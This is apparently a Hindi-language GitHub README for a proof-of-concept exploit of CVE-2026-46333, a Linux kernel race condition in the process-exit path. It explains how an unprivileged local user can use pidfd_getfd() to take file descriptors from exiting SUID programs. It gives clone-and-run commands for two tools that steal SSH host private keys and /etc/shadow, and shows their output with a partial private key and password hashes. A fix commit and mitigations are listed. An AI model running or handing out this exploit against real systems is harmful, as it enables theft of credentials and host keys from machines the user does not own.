
CVE-2026-46333
लिनक्स कर्नेल में रेस कंडीशन भेद्यता के लिए उच्च-गुणवत्ता वाला Proof of Concept
CVE-2026-46333 के लिए एक साफ और विश्वसनीय प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट — लिनक्स कर्नेल के प्रोसेस एग्जिट पथ में रेस कंडीशन के माध्यम से स्थानीय जानकारी का खुलासा।
काली लिनक्स पर SSH होस्ट प्राइवेट की और /etc/shadow को सफलतापूर्वक चुराते हुए
CVE-2026-46333 (जिसे ssh-keysign-pwn भी कहा जाता है) लिनक्स कर्नेल के ptrace और प्रोसेस एग्जिट लॉजिक (do_exit() → exit_mm() exit_files() से पहले) में एक रेस कंडीशन है।
जब कोई विशेषाधिकार प्राप्त प्रक्रिया (जैसे SUID ssh-keysign या chage) एग्जिट के दौरान mm == NULL रखती है, तो डंपेबिलिटी जांच को दरकिनार कर दिया जाता है, जिससे एक अविशेषाधिकार प्राप्त स्थानीय हमलावर pidfd_getfd() का उपयोग करके खुले फाइल डिस्क्रिप्टर चुरा सकता है।
प्रभाव:
/etc/ssh/ssh_host_*_key)/etc/shadow डंप करनाखोजकर्ता: Qualys
समाधान: कर्नेल कमिट 31e62c2ebbfdc3fe3dbdf5e02c92a9dc67087a3a (मई 2026)
chage के माध्यम से /etc/shadow चुराने वालाgit clone https://github.com/0xBlackash/CVE-2026-46333.git
cd CVE-2026-46333
sudo ./CVE-2026-46333
sudo ./CVE-2026-46333-shadow
| फ़ाइल | विवरण |
|---|---|
cve-2026-46333.c | SSH होस्ट प्राइवेट कीज़ चुराने वाला |
cve-2026-46333-shadow.c | chage के माध्यम से /etc/shadow चुराने वाला |
README.md | यह फ़ाइल |
SSH की चुराने वाला:
[+] SUCCESS! Stolen fd 3 -> /etc/ssh/ssh_host_ecdsa_key (round 0)
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAAB...
शैडो चुराने वाला:
[+] SUCCESS! Stolen /etc/shadow (round 0)
root:*:19953:0:99999:7:::
kali:$y$j9T$zY1oKFxJlTgP2WcJhzbNl1$...
31e62c2ebbfd... वाले किसी भी संस्करण में अपडेट करेंsshd_config में EnableSSHKeysign अक्षम करेंयह एक्सप्लॉइट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। इसका उपयोग केवल उन्हीं सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति प्राप्त है। लेखक किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है — उपयोग, संशोधन और वितरण करने के लिए स्वतंत्र महसूस करें।
सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया
सिस्टम को अपडेट रखना सबसे अच्छा बचाव है।